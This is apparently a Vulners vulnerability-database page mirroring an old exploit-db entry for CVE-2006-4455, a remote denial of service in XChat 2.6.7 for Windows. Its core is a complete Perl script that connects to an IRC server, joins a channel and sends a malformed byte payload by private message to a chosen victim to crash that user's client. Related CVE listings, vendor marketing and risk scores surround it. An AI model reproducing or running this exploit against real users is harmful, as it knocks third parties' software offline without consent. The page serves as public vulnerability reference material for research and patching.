Lucene search
+L

XChat 2.6.7 (Windows) - Remote Denial of Service

🗓️ 08 Aug 2006 00:00:00Reported by EloType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Remote Denial of Service attack using XChat 2.6.7 for Window

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-4455
30 Aug 200615:00
cve
cvelist
Cvelist
CVE-2006-4455
30 Aug 200615:00
cvelist
debiancve
Debian CVE
CVE-2006-4455
30 Aug 200615:00
debiancve
exploitdb
Exploit DB
XChat 2.6.7 (Windows) - Remote Denial of Service
7 Aug 200600:00
exploitdb
nvd
NVD
CVE-2006-4455
30 Aug 200616:04
nvd
ptsecurity
Positive Technologies
PT-2006-5255 · Xchat · Xchat
30 Aug 200600:00
ptsecurity
ubuntucve
UbuntuCve
CVE-2006-4455
30 Aug 200616:04
ubuntucve
#!/usr/bin/perl

# rewritten because perl is more elegant than php
# payload taken from original that ratboy submitted

use strict;
use Net::IRC;

my ($nick, $server, $port, $channel, $victim) = @ARGV;

my $irc = new Net::IRC;
my $connect = $irc -> newconn (Nick => "$nick",
Server => "$server",
Port => $port,
Ircname=> 'whatever')
or die "$0: Error\n";

my $payload = "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82";

sub on_connect {
	my $self = shift;

	$self->join("#".$channel);
	$self->privmsg($victim, "$payload");
}

$connect->add_handler('376', \&on_connect);
$irc->start();

# milw0rm.com [2006-08-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.05003
42